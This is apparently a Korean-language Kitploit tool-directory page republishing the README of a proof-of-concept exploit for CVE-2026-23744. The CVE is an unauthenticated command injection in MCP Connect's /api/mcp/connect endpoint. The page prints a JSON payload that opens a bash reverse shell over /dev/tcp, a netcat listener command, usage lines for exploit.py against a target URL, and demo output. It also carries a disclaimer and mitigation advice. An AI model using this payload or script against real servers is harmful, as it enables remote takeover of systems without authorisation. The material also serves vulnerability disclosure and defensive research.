Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23744 — # CVE-2026-23744 개념 증명 익스플로잇 MCP Connect의 인증되지 않은 명령 주입 취약점으로, 원격 코드 실행 및 리버스 셸로 이어집니다. | Kitploit
도구/GitHubGitHub/cylock11/cve-2026-23744
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubcylock11/cve-2026-23744

CVE-2026-23744

# CVE-2026-23744 개념 증명 익스플로잇 MCP Connect의 인증되지 않은 명령 주입 취약점으로, 원격 코드 실행 및 리버스 셸로 이어집니다.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23744 — MCP Connect RCE via Unauthenticated Command Injection

Python Category Type License

⚠️ 면책 조항: 이 저장소는 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 승인 없이 시스템에 이 익스플로잇을 사용하는 것은 불법입니다. 저자는 이 코드의 오용에 대해 책임을 지지 않습니다.


📌 취약점 설명

이 취약점은 /api/mcp/connect 엔드포인트에 존재하며, 인증되지 않은 공격자가 악성 구성을 가진 임의의 MCP(Model Context Protocol) 서버를 등록할 수 있게 합니다. command 필드와 해당 args에 대한 검증이나 삭제가 없기 때문에, 웹 프로세스의 권한으로 서버에서 직접 실행되는 운영 체제 명령을 주입할 수 있습니다.

이는 원격 코드 실행(RCE) 으로 이어지며, 손상된 시스템에서 리버스 셸을 획득하는 데 악용될 수 있습니다.


🧠 기술적 세부 사항

필드세부 사항
유형Remote Code Execution (RCE)
벡터네트워크 (인증 없는 HTTP POST)
엔드포인트/api/mcp/connect
심각도🔴 치명적
인증불필요
영향서버 전체 제어

악성 Payload

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

서버는 이 구성을 처리하고 제공된 인수와 함께 bash 명령을 호출하여 공격자에게 역방향 TCP 연결을 설정합니다.


🛠️ 요구 사항

  • Python 3.x
  • 다음 라이브러리:
root@kitploit:~
pip install requests termcolor

🚀 사용법

root@kitploit:~
python3 exploit.py -l <TU_IP> -u <URL_OBJETIVO>

매개변수

매개변수설명예시
-l사용자 IP (셸을 수신할 위치)192.168.1.50
-u대상의 기본 URLhttps://victim.com

전체 예시

터미널 1 — 리스너:

root@kitploit:~
nc -nlvp 443

터미널 2 — 익스플로잇:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 데모

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

요청이 전송되면 443 포트의 리스너가 손상된 서버의 대화형 셸과 함께 역방향 연결을 수신합니다.


🛡️ 완화 조치

  • /api/mcp/connect의 body에 있는 모든 필드를 처리하기 전에 검증하고 삭제합니다.
  • 엔드포인트를 인증하고 권한이 있는 사용자에게만 액세스를 제한합니다.
  • 사용자 입력에서 직접 시스템 명령을 절대 실행하지 마십시오.
  • 허용된 명령의 화이트리스트를 구현합니다.
  • 웹 서버 프로세스에 최소 권한 원칙을 적용합니다.

📁 저장소 구조

root@kitploit:~
.
├── exploit.py       # Script principal del exploit
└── README.md        # Este archivo

👤 저자

공격적 보안 연구 목적으로 Jorge Arana Fedriani가 개발했습니다.

도구 다운로드